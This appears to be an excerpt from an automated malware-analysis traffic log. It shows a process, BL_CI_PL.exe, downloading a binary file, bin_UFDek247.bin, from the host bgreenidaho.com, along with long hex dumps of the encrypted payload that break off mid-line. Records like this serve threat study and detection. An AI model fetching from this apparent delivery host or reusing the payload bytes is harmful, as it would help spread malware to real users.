                                                                                                                                                    2021-11-29 13:05:26 UTC140INData Raw: 24 6b b9 9c 18 4a ed d6 92 c7 13 48 f9 66 09 7b eb eb 5d 94 b3 93 c5 79 7b df 15 70 58 ea 64 89 f2 20 9b e6 cb d7 17 09 f2 2e a4 6b 2e bf a8 cc 2f 74 a7 c2 b5 3d f1 57 86 3a f2 39 df 10 61 18 fa 5c 56 17 70 87 bd c2 92 5e da 97 ec 20 0a 03 20 98 cd b8 b3 87 55 81 3a 15 3a f4 97 6a 71 3d c8 da 12 24 30 45 63 23 87 4e fa 56 79 b3 32 94 95 91 76 e2 70 30 2c bd 86 4e b0 03 17 6d 76 4f 11 a6 18 28 41 d1 cc ba ee 83 13 08 ff 41 69 c7 5b 69 1e 4b 1f b3 35 5c 02 6e 38 d2 26 a0 e7 df b8 78 00 72 55 5e 54 11 42 bd f3 9e 34 f6 44 44 8c 33 f2 7d ae 52 22 4d 58 bc 1a 52 22 46 13 17 e6 77 82 3b 50 f0 7d de c7 ba 20 23 59 07 e9 9f 7e f1 55 2f 63 18 f8 18 78 2e fc bb a2 22 81 99 6c 58 d6 fb a7 99 3f 6a 25 7f 5e 0d c4 98 1c 23 05 1f 0b 5a 16 ea 1c d3 db e6 2e d6 f7 c3 2c
                                                                                                                                                    Data Ascii: $kJHf{]y{pXd .k./t=W:9a\Vp^ U::jq=$0Ec#NVy2vp0,NmvO(AAi[iK5\n8&xrU^TB4DD3}R"MXR"Fw;P} #Y~U/cx."lX?j%^#Z.,
                                                                                                                                                    2021-11-29 13:05:26 UTC148INData Raw: 70 2a 6b d0 cd 09 a4 bd 55 5a c6 69 3a 07 ea 10 a3 7b 72 ae f3 73 01 d3 49 6f fb e2 9c e0 4d a9 a7 c9 40 fb cc bc a9 8a 37 d5 cc 99 7b ed 9c f9 4b 87 c1 8e 15 c4 79 1f 01 3d 58 5b 37 4c 43 a7 2c f6 92 d4 da 5f a6 7e e8 3d d6 5b 61 4f e1 85 d8 e7 f6 b2 d7 0f 1c 00 6c 15 7d 47 5d 4c 51 ff 77 6a 6a cf 2d e8 59 6f 79 45 64 2f dc 7d 7d 76 3d 9b bd c5 ec 78 7d da 3c 5e af 0c c4 2c d7 f9 08 02 22 bf c7 de 68 0d 3c 78 87 62 8f aa 92 1e 1c cb 9f b1 aa 97 73 e8 d7 2f dc 2d 03 72 b6 09 dd b5 c4 1c 4b 5c 21 0e f7 af f9 19 2c 3d 06 4b a7 c6 fb 2a 50 7a c1 ab 08 0f 1b a1 b7 fa d2 25 a7 68 6c cf 24 3d de fd 38 31 ba 2f ce c8 cc 0e 4d fa 66 e5 2a 8f ce 44 7c 0e fe af 32 d5 d7 d7 5f d6 85 32 41 19 0e af 61 86 34 f0 82 7a e5 53 86 a2 14 ec 3d ba 5b b4 5a b3 95 bb 1c c0 fe
                                                                                                                                                    Data Ascii: p*kUZi:{rsIoM@7{Ky=X[7LC,_~=[aOl}G]LQwjj-YoyEd/}}v=x}<^,"h<xbs/-rK\!,=K*Pz%hl$=81/Mf*D|2_2Aa4zS=[Z
                                                                                                                                                    2021-11-29 13:05:26 UTC156INData Raw: e5 7e 68 7d 58 14 5b 59 d3 e0 53 00 e1 8c 06 04 b3 26 f5 28 e2 04 7f d7 c9 67 cf 98 35 da d6 5b 3b 34 4c bf 7a 0d 84 20 81 a9 38 b1 e0 a3 79 df 9c 6f 62 20 df 05 60 79 a1 a1 2c d1 2e 3a 6f e6 4b 4c 36 aa f6 a3 39 c1 68 82 08 ea 41 5c cd 27 93 8f f8 9f de 74 53 91 b3 be b0 63 3e a7 ff f5 a4 b4 48 1d 4a f7 29 83 4b 87 bb 23 80 f2 38 1b 4f b5 62 c2 96 3c 37 13 61 dc f0 8a 9b 7f 01 8d 1e cf d4 84 e8 0c 48 b9 57 1f cc 3e b4 74 1e c8 df 25 f3 8a c1 ba 6e fc 9e 7a df d4 11 bd 5c 26 9b 28 92 98 89 8e 7c b3 9e de 16 fc 82 72 14 b8 aa cf 94 6f 9a df d0 a8 f9 aa ab ea e7 da 27 4a 3f 76 af 49 62 7f a3 46 47 0b 8b b0 da 53 c9 d5 54 5f 26 46 e1 0d 52 16 71 95 11 13 bc a9 f2 15 f4 ac 34 83 08 b4 85 74 d0 c9 78 bc 4b e1 62 b6 2d bc 29 1a fe c3 f3 10 e9 5d 10 2b 22 c1 80
                                                                                                                                                    Data Ascii: ~h}X[YS&(g5[;4Lz 8yob `y,.:oKL69hA\'tSc>HJ)K#8Ob<7aHW>t%nz\&(|ro'J?vIbFGST_&FRq4txKb-)]+"


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    1192.168.11.204984220.124.109.2443C:\Users\user\Desktop\BL_CI_PL.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2021-11-29 13:11:05 UTC163OUTGET /Newfile/bin_UFDek247.bin HTTP/1.1
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                    Host: bgreenidaho.com
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    2021-11-29 13:11:06 UTC164INHTTP/1.1 200 OK
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:11:06 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Last-Modified: Mon, 29 Nov 2021 09:03:01 GMT
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Content-Length: 167488
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                    2021-11-29 13:11:06 UTC164INData Raw: 92 59 6a 3b 87 e0 3e ba ac 61 1e 9d f6 c9 df ba 62 bf e5 c7 7a c4 9c 08 b1 4e d4 60 c3 3f d4 88 b8 72 47 b8 2f 6d 29 8e 33 82 67 e5 01 50 d3 29 cc 40 5b 5d d3 b4 13 93 10 4a 50 4d e4 45 c5 38 95 37 99 7a 58 85 3e c8 30 3e 65 a5 f1 fe 32 8e d3 0c 06 d8 57 89 63 8e 2d b5 ba 39 47 6b 5f 57 9b 95 58 e8 89 7f c2 84 8b 82 7f 21 b0 74 fb 78 9c c8 8f d1 65 3f d7 2e cb cc 0b 54 47 5e 2f c7 a1 2c 6b f6 3f 5b 51 cf 76 c1 f9 8b 60 85 31 3f f8 03 5d 7b bb 1c a8 30 fc f2 c4 c6 f9 be be 63 ee 83 51 53 d6 e2 15 c0 de 05 51 54 88 de b8 29 a5 de 6e be aa d1 f5 66 37 e8 52 f1 1b 6f 68 66 6f e6 bd 78 7f d6 c0 a9 24 5b b0 50 cd 2d e9 55 b7 e6 0d 63 45 ab 40 4c f6 ff 26 1e fa 8d 35 6d c9 f8 cb 43 fc 85 ce aa 17 53 9f 60 07 33 3b 17 8c ab 3b 8a 39 94 cc f5 24 ed 10 4c b0 a4 6c
                                                                                                                                                    Data Ascii: Yj;>abzN`?rG/m)3gP)@[]JPME87zX>0>e2Wc-9Gk_WX!txe?.TG^/,k?[Qv`1?]{0cQSQT)nf7Rohfox$[P-UcE@L&5mCS`3;;9$Ll
                                                                                                                                                    2021-11-29 13:11:06 UTC172INData Raw: 28 0f 58 ee 0d a9 e5 f4 84 21 ce b3 15 95 9c 98 9d 51 9c 90 7b 9f 34 b8 00 25 94 b8 77 00 7a 36 cf 99 e3 4e fb 73 3d 88 5b ce 72 27 55 be 16 b9 c2 33 fe 38 59 04 4d 59 95 89 9f 6d d9 81 3d 7b 28 e3 1e e3 77 f1 af 86 63 37 d0 e4 50 55 10 ab 93 32 f4 ab 06 09 78 69 68 b6 8d 06 c0 10 88 bb ee 10 3f 42 cd 5a 9a a8 00 f6 fb 1c 0e f6 ab bc 62 60 bc 64 59 49 17 89 f2 5d cc c9 d1 8d 7d 94 39 e9 53 8a 33 6e 52 97 56 96 cd 5e f4 22 07 93 2b 09 b3 28 dc ea 1c 98 ed 7f 91 9b be 3a 56 64 65 a2 1e e7 47 b2 20 36 52 f9 8b d5 cf 53 22 15 c5 47 2e d3 40 74 9b da 50 0b 6e d9 03 07 1b 1c ba c5 8c d1 e7 9d ad da 04 55 c4 75 b0 1a 42 f2 b3 2d 9c b2 03 5a ca 3f 4b 1a 60 32 50 95 f6 64 d3 06 c5 8f 8a ce 5e 8f 6d aa 17 56 37 03 a1 c6 bd 3f e7 1f ae 19 40 7f a4 fd de 2a 95 3a cb
                                                                                                                                                    Data Ascii: (X!Q{4%wz6Ns=[r'U38YMYm={(wc7PU2xih?BZb`dYI]}9S3nRV^"+(:VdeG 6RS"G.@tPnUuB-Z?K`2Pd^mV7?@*:
                                                                                                                                                    2021-11-29 13:11:06 UTC179INData Raw: 87 15 4d f1 2e 9a c0 5e 6b 49 aa 82 11 79 99 6a 4f 9d 1d e4 f8 b6 aa d4 8b 12 e9 71 82 39 63 20 8b c9 3c 33 4c af b4 8a a2 a7 9f 6d e0 7a 59 95 ea fc 2a 76 dc 77 57 60 8e fe 6c d7 ab b8 91 eb 8a 0c 89 8f 1b f1 da a7 32 98 0d 0f 32 96 fa 18 9f ed 7f d1 31 ae e4 f4 e0 1d 5f 21 48 79 af c8 e4 6a 83 a7 c3 76 e1 11 04 59 28 35 07 49 cf 88 a8 74 c6 83 0b c4 6a 6b 86 44 3a ac 85 6b e8 38 0c 64 b2 59 8b 39 c7 24 16 10 a9 10 c1 78 9d c9 2f df 29 f7 dd e0 e2 4c 93 ee d8 b2 c8 5d c6 84 6d c2 04 dd 6f 4d 3e 66 29 25 4c 55 68 6d cd 2f 81 06 79 42 5f 3f cd 68 22 02 53 a7 02 a1 a0 17 c3 22 b8 fd 39 a3 38 46 86 86 ec 99 17 52 90 2a bb 1d 9b 03 a7 df b6 00 74 62 1b e5 db 11 b8 85 ef 2e 00 fa 82 3a dd 04 cd b8 87 2a d6 37 84 1a 19 f7 ad 8d a9 bc 17 37 d3 06 02 64 8a 71 ed
                                                                                                                                                    Data Ascii: M.^kIyjOq9c <3LmzY*vwW`l221_!HyjvY(5ItjkD:k8dY9$x/)L]moM>f)%LUhm/yB_?h"S"98FR*tb.:*77dq
                                                                                                                                                    2021-11-29 13:11:06 UTC187INData Raw: 73 80 90 04 06 a6 90 12 64 e6 ad ec db 43 46 9c 9e 64 f3 5c e1 18 74 95 54 97 95 7c f7 78 bd 33 fd 8e d4 65 e6 d2 19 8a 64 25 68 1d 2f 0b cb 06 50 e2 45 3a 7f 77 6e 34 65 db 49 ab 3b 8a 6f 1f b9 fd 1e a8 7a 59 af f3 85 09 03 29 a7 34 04 7b 8c 5b 10 df d3 25 21 12 ea 71 1b d3 55 43 29 3f ed 04 0d 96 4e 69 ba fa cc 6a 63 90 0d 28 95 3a 68 22 4a bc 63 25 33 71 dd 20 43 43 52 2e f6 9d 4f 03 c5 5d 84 ca b7 13 a6 1f 94 9b 77 bf b5 b6 8d a6 91 01 47 e7 73 14 15 c2 3f 52 ac 6a 77 e9 b0 a8 3a 43 b9 97 fb 9a 49 fe e2 84 92 4a 03 e3 ba f8 45 69 0c 8c 62 5d 5d c1 a3 08 a1 27 0c d4 3d 6a 7d 2b b2 61 73 c6 3b 78 26 0a 62 e1 ca d9 cf bd 9c a8 11 a3 c8 23 c0 52 c6 28 7c 8a 32 b8 5a d2 aa 1d 41 2d 67 c8 bf d3 20 3c 90 fe 9e 0b 03 6f 9c fd 32 6c 86 00 0c 61 9c 38 c5 01 8c
                                                                                                                                                    Data Ascii: sdCFd\tT|x3ed%h/PE:wn4eI;ozY)4{[%!qUC)?Nijc(:h"Jc%3q CCR.O]wGs?Rjw:CIJEib]]'=j}+as;x&b#R(|2ZA-g <o2la8
                                                                                                                                                    2021-11-29 13:11:06 UTC195INData Raw: 28 61 57 20 d6 2c 66 92 3d 80 15 11 96 5e a2 a5 f0 7c 71 92 d6 f1 50 ac ff 69 c7 57 c0 18 e0 d4 55 db 6b 63 c1 40 d4 6a c5 c0 a8 46 b4 36 5c d0 d9 74 9a 21 79 fb 58 f0 55 bb 79 fa c0 2b 22 ec d4 a2 7f 15 1e b7 b1 31 f3 8c f9 1a b3 70 10 cd ae fe c2 26 51 3d c7 82 35 b0 a8 b9 6f 97 36 3a ee 97 d9 1a 82 0e a8 d9 37 5e 2e f9 97 5c 51 7d 73 2e ca a3 60 e2 03 f0 86 f1 c0 2e 2a b6 9a 9b 45 7e 80 47 68 ab b2 47 16 d4 05 f5 cd e0 64 00 c2 8c 03 91 7e 1d c1 da 50 18 67 6f 3d f9 2e 3f 34 42 46 6c cc 4a 8b 46 f2 a1 6a 9d 42 ab cb 2e a8 dc f2 6b 6d 8c b0 64 bd a8 eb 2d d5 41 56 7a f2 b5 e3 09 62 f1 8a b1 58 9d d0 08 4e 9d b3 ff ad 3f f3 81 aa d2 17 4f 0f 88 95 de f0 80 de 96 92 d8 fe 78 0b d7 8c 94 6c 9a 9c db c7 73 ad 77 11 c9 c0 f4 5e 18 74 cc 4a e8 41 e9 c1 2b 1b
                                                                                                                                                    Data Ascii: (aW ,f=^|qPiWUkc@jF6\t!yXUy+"1p&Q=5o6:7^.\Q}s.`.*E~GhGd~Pgo=.?4BFlJFjB.kmd-AVzbXN?Oxlsw^tJA+
                                                                                                                                                    2021-11-29 13:11:06 UTC203INData Raw: 38 e2 b4 07 99 20 1e e3 05 1f 6c a8 42 01 3d c7 c2 59 b0 c4 b9 e1 2a 28 1b 9b 03 11 62 7d d3 9c d7 88 72 a7 00 eb e6 05 bc 88 a2 4c af 60 39 d4 6b f0 1a 93 a1 3a 3f a9 c3 4e 80 b2 74 74 d8 b7 35 ac dc 5a 1d 56 09 66 0e 76 aa 27 c2 9b 95 6f d7 3b a3 0d 1a 3a 41 ac 17 af 0f b5 79 4f 01 77 9b 2e 17 3c 23 cc 62 3a d1 d4 9b 32 60 28 2a 36 e6 91 73 9e 02 d3 92 b2 e9 07 c7 fe 70 7e 53 33 12 9c 6e 2f 7c 83 5d 36 66 79 08 c9 7a 07 52 5f 4a 0e 88 4c 70 9b f3 37 a5 18 5c fa 01 30 38 df d9 87 a7 64 7b 66 79 ce 5e 65 0b 80 90 45 6a ac d2 12 9d fb 1a 10 ad 77 a0 7b 45 5b 48 83 de b5 77 2b ce 70 c2 8e 05 df 33 07 d6 e8 01 07 f6 65 ca f2 fb 6e be e5 67 2f bf 66 45 b1 43 f9 e2 f3 34 26 ce 54 41 29 3f 6a 95 10 50 e6 51 a9 0b 83 05 d4 ae ba 15 3e fe 31 49 ce db a6 e2 93 39
                                                                                                                                                    Data Ascii: 8 lB=Y*(b}rL`9k:?Ntt5ZVfv'o;:AyOw.<#b:2`(*6sp~S3n/|]6fyzR_JLp7\08d{fy^eEjw{E[Hw+p3eng/fEC4&TA)?jPQ>1I9
                                                                                                                                                    2021-11-29 13:11:06 UTC211INData Raw: 8c e7 6c 7b ad 45 ec 84 d3 b8 b9 d7 c4 6e c1 85 15 79 d3 ba b6 1b 24 c1 73 48 63 55 b5 4f ef 65 c7 2e a8 0f 60 8b ad af 40 1f 98 25 eb d1 a7 3b e7 6b 54 a2 b3 84 45 00 56 e5 de 6f d3 08 32 33 b1 25 6e 63 2a 9d aa 45 79 4e 82 1d c7 ca 60 5c 8d 1b 5a 55 aa d4 1c dc 25 e6 1e ad a6 10 bd e2 4a 3f ba c8 c0 77 17 85 f9 a5 01 e9 ef fe 8e a9 67 25 b8 f0 0f 48 e0 db 7d 1f 2f 42 e5 c2 22 77 65 99 07 d6 df f7 06 f6 6d 4b f2 27 12 b3 60 a7 5b d3 85 a0 fc 80 93 bf f3 fc d6 63 43 b9 6a 68 82 d4 bf a7 94 89 d4 59 f2 bf d3 af 38 cb 88 16 45 11 92 db 95 2b 76 74 a7 22 ff 15 43 1c 88 2b 7c 8a 8f 28 0c 89 6f ca 4a fe 6e f1 b0 36 13 47 6a f8 f6 0b 40 73 aa 99 20 6a b7 f4 aa 07 dc c1 0d d8 f6 e4 0f c7 25 a8 cb 3e 99 f4 cb a2 99 29 c6 fb e2 5b a3 b1 1b 1b b8 5b 2e 62 d0 3e 1b
                                                                                                                                                    Data Ascii: l{Eny$sHcUOe.`@%;kTEVo23%nc*EyN`\ZU%J?wg%H}/B"wemK'`[cCjhY8E+vt"C+|(oJn6Gj@s j%>)[[.b>
                                                                                                                                                    2021-11-29 13:11:06 UTC218INData Raw: 3e 9f 4e 0f 88 af 1d ce 93 fb fc 1f 37 fa d2 a7 c0 06 7a e1 2e e1 e0 2c ab 03 ff bd 08 b4 05 11 4d f5 dc 3e 62 bb 9f d5 45 8c 22 7c 76 5b e3 66 83 76 75 27 42 35 6e 8e 05 d4 83 06 f9 ce 20 06 f6 ee 67 fa be aa b2 ed 38 07 cd 0e 45 f2 ab 05 7a 7e 79 d5 5f ec cb ad ce 62 1e 5d 0b 39 ec a5 9c 0e 40 7a 73 95 f9 3f 41 ad da c2 db 95 7d 47 15 f9 a2 ff e9 37 6c 01 a4 7c 76 21 80 b4 dc 6f 2d 4a 7d 27 45 ae 69 57 b9 95 a9 a0 bd 8c 61 08 a5 f8 f1 a4 b1 34 83 bc b9 31 25 18 95 27 f6 2d e0 4d be 1f 3f 9e f4 71 03 17 c4 75 cd bd b3 19 4b b8 5b 6c 63 d0 3e 1b b9 b1 05 d3 0e 7b 15 c3 2d ae fb 7c 97 b3 64 30 2e 27 5c e2 1d 62 64 99 15 eb d4 43 1a 4b 42 3e 3e 5f a4 59 a3 4c af 12 ff 35 26 c1 31 45 74 24 bb e0 80 a8 1a f6 ae 3b a8 69 b0 76 c4 0f 17 3f 92 2d de 3c 72 2b d5
                                                                                                                                                    Data Ascii: >N7z.,M>bE"|v[fvu'B5n g8Ez~y_b]9@zs?A}G7l|v!o-J}'EiWa41%'-M?quK[lc>{-|d0.'\bdCKB>>_YL5&1Et$;iv?-<r+
                                                                                                                                                    2021-11-29 13:11:06 UTC226INData Raw: 60 a7 5b 06 5b 49 cb 43 ab 3f fb 81 2b 60 43 16 d2 54 c1 1e 5d d5 e6 fc a4 a6 f1 11 c4 10 79 15 6f 95 81 bb a8 58 29 6e e6 00 cc 98 a3 9d a0 6e 90 56 81 89 8f 85 b4 b5 03 2d 4a 47 bf 7d f5 36 6c 7c 91 cf 29 6f 42 7c a8 99 5c 25 c2 69 e1 4d 49 b6 a2 aa 84 42 79 dd 87 3a 49 8f 5a ff 9c 79 e5 10 dc f9 e2 cc 3f 77 1d 49 dd 16 da 61 d0 4a 3f d7 52 80 f9 e6 09 6f d3 cb 97 04 2c f2 9b 22 46 7e aa 52 6c fe 18 5b bc 8b e3 19 44 18 4b 93 6f 0d b7 0b 25 18 4c d3 29 8f 6b c8 24 0a 0f 72 94 46 6a 40 cb 80 27 f8 d3 f9 09 da 58 c5 d4 c9 d8 d0 bc 73 8b fc 2b 93 71 f3 f3 4e e5 0e 0f a9 ba fe 30 7e 09 b5 53 27 a4 73 28 cc b0 a9 c4 de e3 9b 96 c1 86 af de 7d 13 89 91 5f 88 da a5 f7 bc ed bb 2a b3 99 08 f3 26 61 7a 47 77 57 6f 41 a0 b2 4a a8 7a b2 71 00 07 44 36 a8 71 a2 27
                                                                                                                                                    Data Ascii: `[[IC?+`CT]yoX)nnV-JG}6l|)oB|\%iMIBy:IZy?wIaJ?Ro,"F~Rl[DKo%L)k$rFj@'Xs+qN0~S's(}_*&azGwWoAJzqD6q'
                                                                                                                                                    2021-11-29 13:11:06 UTC234INData Raw: ee 55 0c a3 fd c1 f8 2d 0c b1 85 d7 27 09 d2 b6 6c 58 23 cb 3f 99 ff cf a2 f8 12 2c ec 53 16 bc b3 9a df 65 be b2 8f d4 70 20 df 52 80 c0 a5 0d ad 27 de 50 de 7c a4 1b 40 e4 82 37 bb a8 88 9d c8 9e 5b 29 84 54 c0 91 6c 3e 31 60 ea 9b f3 3e 15 2c ed 35 13 07 12 0c f1 84 45 97 7f 40 78 7e 6e 51 9d f1 32 8e 06 82 42 20 95 2a c9 ea ba c7 12 0d c8 68 13 a6 be 6f a7 34 fd e2 f6 84 30 ab 51 1e 84 12 69 bf b5 1f 05 68 ce ce 26 0b 3d 23 d1 ba 30 1b 93 77 21 30 37 b2 a4 ee 8b c7 83 3f 30 81 50 eb df 54 ea 87 eb d4 a1 cb ac 8c 36 71 00 d9 87 21 3f c2 5f 4d 6b e2 4a f7 1c 69 8c f1 8b cd fd cf 85 83 12 c9 0a 38 82 5f 9a b3 c6 a0 36 03 52 12 83 7a ce 57 3a 81 95 4a 23 8a a5 c6 d6 09 18 ce 7f 30 3d 0c 7c 0e cd 0e 30 bc bd 6a fe af ae 52 e0 f9 7a 8f 7f c6 53 db db 4f 8a
                                                                                                                                                    Data Ascii: U-'lX#?,Sep R'P|@7[)Tl>1`>,5E@x~nQ2B *ho40Qih&=#0w!07?0PT6q!?_MkJi8_6RzW:J#0=|0jRzSO
                                                                                                                                                    2021-11-29 13:11:06 UTC242INData Raw: b3 6c 3e 58 96 32 57 e8 e3 03 bf d5 67 12 97 bf c7 bf 6c 44 94 68 12 a3 b8 76 d3 4b ee da 58 16 46 72 28 1b 92 07 37 d4 c7 94 f2 37 68 86 cd 25 75 af eb b3 3d a7 61 6d 68 59 a2 80 0d 65 64 10 23 1a a2 c1 1a 35 f4 a8 dc d0 65 8d 3b 3a 22 d9 08 58 b4 2e 2e b5 e4 30 55 30 81 8a c6 c7 f8 6f ad 14 7b 08 23 42 6c b1 71 8b 5b 43 37 28 40 ee 27 69 3b e7 9f 0c ad bc 23 50 d6 89 d5 27 10 c7 d8 94 b6 f9 91 10 6b 45 e7 f7 88 86 99 2f fa ce 57 b9 10 e4 b6 68 44 41 22 bb 09 4b ca 1a f3 e1 5c f7 e0 99 c5 e2 ad 86 e1 9b ff ae 56 3b ec 37 31 85 b7 ab 33 d5 ba 08 aa d8 a2 50 e8 d9 89 4f 6b 7b 66 06 6a d1 88 48 7e 1f 20 8c 40 29 66 2a ae 23 e8 f0 7f 12 9f 89 23 67 71 e5 ed a2 e7 0d 38 6d 2f c7 8f fa 7f a3 7f 30 68 c1 a8 b1 34 3a 99 2c 41 a7 4f 37 84 1c 50 0e 54 f6 a4 c6 32
                                                                                                                                                    Data Ascii: l>X2WglDhvKXFr(77h%u=amhYed#5e;:"X..0U0o{#Blq[C7(@'i;#P'kE/WhDA"K\V;713POk{fjH~ @)f*##gq8m/0h4:,AO7PT2
                                                                                                                                                    2021-11-29 13:11:06 UTC250INData Raw: dc cf d1 bb 9b 53 27 e7 6a d2 9d a9 77 5e 8f 69 27 e9 cf 85 45 a6 df b5 f9 cb 1c 29 70 7c b6 29 e0 12 d6 a6 7e a5 00 89 26 be 7b f2 da 1a 49 7e e0 53 bb 5b 64 1a c7 c5 ec 68 7a cf c8 0b 9d 99 3c 50 70 23 2e d1 3a fc 4b a4 70 ad ce 1c ee 1a 5a cc ae ce 93 c2 a0 c9 d8 d3 d8 01 81 3f 92 21 82 42 f7 00 6f f1 ee 00 22 a3 06 a4 b3 cc 43 3a 9e 2f 63 d3 52 05 ff d2 e6 c4 94 97 9a a1 3d 56 d6 61 af 08 55 49 5e 42 fb c1 54 68 5e 6c ce 27 91 64 4c 83 bb 88 d6 6e 93 bc 17 ef 38 5a 31 c4 cf a9 8b c3 e8 66 8a 6f 11 43 10 6a 18 5e 45 19 fd 17 35 7e f3 54 bf ea e2 21 19 12 2d bd 29 44 5a 2e 9f 04 86 bc 4f 49 3f 9a 8c 6d ae 85 a0 54 7e 92 9d ff 2b 42 f4 45 72 42 11 04 1f 3e 57 a8 a7 e2 04 35 fc 20 78 19 ef 52 da d4 d9 22 e2 e5 ff 17 fb 70 ec d9 e2 a5 68 5c 53 c7 45 4e b3
                                                                                                                                                    Data Ascii: S'jw^i'E)p|)~&{I~S[dhz<Pp#.:KpZ?!Bo"C:/cR=VaUI^BTh^l'dLn8Z1foCj^E5~T!-)DZ.OI?mT~+BErB>W5 xR"ph\SEN
                                                                                                                                                    2021-11-29 13:11:06 UTC258INData Raw: 70 bb 5b 50 eb b8 4a 55 27 2d 00 43 f6 21 9b c0 3f 5f 08 94 b1 bf 3d 1d c7 d3 3d 1d e9 f5 ec a5 78 99 98 66 e7 04 52 f5 fb e0 6b 95 4a fd d4 37 f3 88 2d 6b 0d 74 9c 71 29 9a 78 48 a9 ca 0f 4a 28 b1 92 5f 7b ec 5d a4 52 1f c3 cd b7 1a 9b 64 db c0 17 9f 2a 1e 42 60 93 3b b9 cf c6 fb 2e e9 ee 2e ef 96 97 37 58 ee a3 12 07 0c 05 8c 1a 31 2c 95 c9 94 f4 ca d2 53 17 89 ba 81 27 92 b6 38 e7 0c 78 f8 d8 00 20 b2 07 1f eb 5a 9a 76 b9 30 0f 8e 1f b1 6f a4 e5 4f e0 c3 b7 07 5d 6a a7 82 9a 28 4b c2 b7 6a 3a e7 4f 8b 78 bc dc a2 99 86 ec 79 97 c6 fc 0a f4 ab 95 44 78 4e e9 7f 39 d4 f9 10 a7 68 4c f0 be 9b fa 4c 44 91 6e 8f 17 17 9e fa 89 22 75 89 22 5a 67 ba f6 5b 13 e5 57 de fd 56 9f 51 94 4b 68 fd 8a fd 03 09 0e 4e f5 b1 ac 8b 71 2a 63 00 a7 34 e4 90 02 4f 45 09 c4
                                                                                                                                                    Data Ascii: p[PJU'-C!?_==xfRkJ7-ktq)xHJ(_{]Rd*B`;..7X1,S'8x Zv0oO]j(Kj:OxyDxN9hLLDn"u"Zg[WVQKhNq*c4OE
                                                                                                                                                    2021-11-29 13:11:06 UTC265INData Raw: 2d 14 5c a0 88 2c 26 05 bf d4 1b 5c f7 6f 4d 51 f7 97 f8 1b 91 21 91 23 be ec 28 fb f7 55 0d 2c 54 35 97 b5 d8 80 cb 67 2d 96 76 27 5c 29 9b 0e 9e d7 30 af e6 c0 6d dc 28 39 c0 c2 43 75 9a 6d 0d d8 fe 1f 50 d0 fb c7 4a 8b 76 db 69 35 e8 e7 4d 4a aa 3b f6 83 95 58 e8 00 3a 3e 0f ce 8a f4 29 3b 21 07 f1 16 08 8f d1 65 b4 32 73 08 00 5e df 13 0f 4b 66 b7 33 d1 f8 b6 aa a4 89 12 85 73 47 6d a4 65 57 1a 95 20 c8 2c 39 52 8c 2c 49 b1 2e 74 81 b4 ad 82 a3 33 36 7d d0 50 27 bb 90 b4 31 30 1a ab 01 43 54 57 18 ee 8e 67 b4 2d 6f 07 7a f7 ec 84 6e 44 d7 e6 c2 5e d1 91 e1 96 1c d1 91 b1 d6 33 58 69 f7 bf 27 b9 e1 e9 c3 91 99 e9 56 c0 8a ef 60 13 e9 47 07 4d c7 63 69 38 32 77 7d c2 b1 95 2b a3 28 45 92 39 e0 88 78 3d a8 9b 1a cc f2 3f 43 b9 30 a7 b7 43 af 01 1e a5 e8
                                                                                                                                                    Data Ascii: -\,&\oMQ!#(U,T5g-v'\)0m(9CumPJvi5MJ;X:>);!e2s^Kf3sGmeW ,9R,I.t36}P'10CTWg-oznD^3Xi'V`GMci82w}+(E9x=?C0C
                                                                                                                                                    2021-11-29 13:11:06 UTC273INData Raw: 72 5b 90 44 65 8e 70 a6 f5 45 65 e3 64 29 97 e7 86 b3 d6 21 49 61 d6 41 f2 25 cf ff 87 be b8 cb 71 58 18 2b d8 aa 72 cc 0b 54 cc 85 16 98 ab 3c 57 56 3f ef 58 81 90 69 75 63 89 a4 65 57 91 fb 7a 8e 09 06 85 c9 d2 97 6f f2 9c 5b 95 00 cb a0 e5 64 a6 78 37 40 01 93 bc b0 c0 14 2b 7c 8f 3a 5f cf 09 d0 63 e7 6f 62 4a 7c 5f e5 60 ed 52 8c 81 a5 cd a4 99 b6 4d 0a 09 3a 1f d5 47 9e 51 70 26 c4 03 65 4a 62 5d 69 97 09 9e 01 81 78 28 e9 48 f7 4f d7 93 b2 46 f4 ad 5a d6 24 84 a0 73 28 ff 86 bc 54 b9 e6 ff ed 04 0f 7f 62 79 90 87 2d d5 3a 9b 34 57 10 80 c0 9d 29 08 5f 47 65 09 de 49 d8 31 b4 2a d3 31 4c 5c 70 34 9d 09 e1 16 70 15 85 3c 2d 2c 0c bd c6 72 bf af e2 87 fb f0 de 24 c5 0b 02 18 d8 8e cd c8 57 3f 6a fe fe 78 ce fc 52 34 5a 9d fb 1a e4 4c 17 89 83 44 aa 26
                                                                                                                                                    Data Ascii: r[DepEed)!IaA%qX+rT<WV?XiuceWzo[dx7@+|:_cobJ|_`RM:GQp&eJb]ix(HOFZ$s(Tby-:4W)_GeI1*1L\p4p<-,r$W?jxR4ZLD&
                                                                                                                                                    2021-11-29 13:11:06 UTC281INData Raw: 5c 0c a5 98 d0 d0 54 59 cb bb be 7e 18 89 2c 1c 93 c0 b7 24 91 eb 09 c8 e9 c9 b3 0c 54 70 e4 fa 6d b0 0e e4 ac 80 66 12 80 82 3b 85 b9 19 69 95 d4 08 90 16 d5 47 de 7d 7c f7 2b 30 f4 d2 6c 5c ed 61 de 29 01 86 da 14 a1 ef 0b c4 82 9f ba 86 52 74 80 b6 bc 83 d1 6e 54 c4 49 d1 94 cc f5 74 f0 d3 24 74 2d e5 23 36 b8 45 48 3f a8 e1 9b 65 9d 5e fa 8e 23 42 f9 1a dd dc dc cb c0 99 80 cd c1 18 e0 3c c6 04 02 eb f0 ca 5c 83 52 09 19 bd fa 4b 50 2c 26 8b 90 e1 51 7b 33 8a a6 84 6e 05 28 95 94 b4 17 c8 a4 fe 64 88 7d 5d b6 8d f9 1a bc d9 4c c8 63 ca 20 cf a3 18 7d c5 f6 58 a8 b9 87 a9 4a f8 07 bc 20 5c f6 1c 12 54 b2 52 d2 5e ab e5 9e 40 03 a9 02 4b 60 0a 06 0d 21 cd 43 36 8f c5 db 44 a7 7e 80 af 4f c6 70 ae 10 53 13 ea 16 09 64 8d 8f 84 0a 05 c1 36 19 